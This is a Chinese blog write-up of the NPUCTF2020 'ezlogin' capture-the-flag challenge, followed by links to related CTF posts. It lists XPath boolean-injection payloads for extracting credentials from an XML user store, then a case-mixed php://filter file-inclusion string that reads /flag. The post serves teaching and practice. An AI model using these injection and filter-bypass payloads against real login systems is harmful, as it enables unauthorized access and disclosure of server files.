[NPUCTF2020]ezlogin

最新推荐文章于 2024-04-01 13:07:25 发布
最新推荐文章于 2024-04-01 13:07:25 发布
阅读量601 收藏 2
点赞数
分类专栏: 漏洞整理 文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/125252706
版权

考点:

xPath注入

解题:

这题服务端用户名和密码通过xml文件存储,通过将提交的用户名和密码拼接到xpath中进行查询,查询到数据即通过验证,反之则未通过。

猜测后台xpath语法:

//root/accounts/user[username/text()=$username and password/text()=$password]

我们可以在$username处进行注入

Bool注入过程

1.获取根下的节点个数

'or count(/*)=1  or ''='    #非法操作
'or count(/*)=2  or ''='    #用户名或密码错误

通过count(/)获取根下节点个数,当等于2时错误因此判断根下只有一个节点。

2.获取根下节点名

# 获取节点名长度
'or string-length(name(/*[1]))=4 or ''='
# bool注入获取节点ming
'or substring(name(/*[1]), 1, 1)='a'  or ''='

string-length() :获取字符串长度

substring()      :截取字符串

name()           :获取节点名称

3.重复1和2遍历出所有叶子节点

'or count(/root/accounts/user/username*)>0  or ''=' 报错表明username已是叶子节点,使用text()获取文本。

'or substring(/root/accounts/user/username[1]/text(), 1, 1)='a'  or ''='

最终可以爆出用户名以及哈希:adm1n:cf7414b5bdb2e65ee43083f4ddbc4d9f

在线md5解密得到:gtfly123

使用adm1n:gtfly123登入:

 查看源码

在url中发现file参数,尝试利用filter协议读取flag

由于过滤了php和base,通过大小写绕过:

?file=pHp://filter/convert.bASe64-encode/resource=/flag

 得到flag:

 

nigo134
关注
专栏目录
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3100
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
[NPUCTF2020]Classical Cipher
2er0!=O的博客
07-23 1192
[NPUCTF2020]Classical Cipher 附件: key.txt: 解密后的flag请用flag{}包裹 压缩包密码:gsv_pvb_rh_zgyzhs 对应明文: ***_key_**_****** 词频分析 得到压缩包密码: 第一个尝试无果,发现第二个才是正确的密码: the_key_is_atbash 猪圈加动物???? 解密得到flag: classicalcode 根据题目要求套上flag提交即可! ...
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]认清形势,建立信心-WP
luoluopeach
09-10 678
题目: from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e,
[NPUCTF2020]共 模 攻 击
2er0!=O的博客
08-01 1017
[NPUCTF2020]共 模 攻 击 附件: hint.py: from gmpy2 import * from Crypto.Util.number import * from secret import hint m = bytes_to_long(hint) p = getPrime(256) c = pow(m, 256, p) print(p) p, q = getPrime(256), getPrime(256) n = p * q e1, e2 = getPrime(32), getP
BUUCTF--[NPUCTF2020]ezlogin
qq_46263951的博客
07-28 588
进入页面后是一个登录页面 几番尝试后没啥发现,尝试抓包 判断是一个Xpath数据,这里需要使用xpath注入 先学习一下Xpath注入 这里使用大佬的脚本进行探测 import requests import re import time session = requests.session() url = "http://391bfefa-8949-4535-8129-07c86723c6b9.node4.buuoj.cn" chars = "ABCDEFGHIJKLMNOPQRST..
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 471
xPATH
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 941
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]验证码
feng的博客
04-02 1435
知识点 JS弱类型 JS的toString特性 正则表达式绕过 JS箭头函数利用 JS原型链 不会node.js我太菜了,要慢慢学起来。 WP 进入环境访问/source路由看到源码: const express = require('express'); const bodyParser = require('body-parser'); const cookieSession = require('cookie-session'); const fs = require('fs'); const
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 702
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
[NPUCTF2020]验证
最新发布
2202_75361164的博客
04-01 2018
[NPUCTF2020]验证🐎 首先要first和second的length属性相同,那就不能用数字和字典了,使用字符串或者数组 然后因为`keys[0]`我们不知道,但是他基本上是String类型,根据上面的String类型加别的类型规则,我们只需让`first=[1]`,second='1',就可以让`first+keys[0] === second+keys[0]`,从而绕过md5 不能用text格式了,需要用json传,保证一个是数组一个是字符串。 根据上面我们在来看这题需要使用箭头函数的自调
npuctf
zipry的博客
06-26 742
NPUCTF 复现 CTF WP 计算机网络 CTF 学习总结 密码学 操作系统 NPUCTF 复现 2个月前 / 0评 / 1赞 赏 码比赛的时候运维太差了,所以就想着赛后复现一下。Table of Contents[NPUCTF2020]ReadlezPHP[NPUCTF2020]ezlogin[NPUCTF2020]验证????[NPUCTF
NUAA CTF校赛Web ezlogin
WeiDuoe的博客
04-14 632
看到提示说要让传入的username和password的MD5值强相等并且username和password弱相等,于是想到如果传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较里面null=null为true,构造payload,username[]=1&password[]=2。file=setu于猜测是最后加了.php,于是去掉.php的后缀后最终读到了base64加密后的源码。,这样子表示可能是文件包含漏洞的考点,于是尝试读取一下源码,尝试。Ctrl+u查看源码。
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值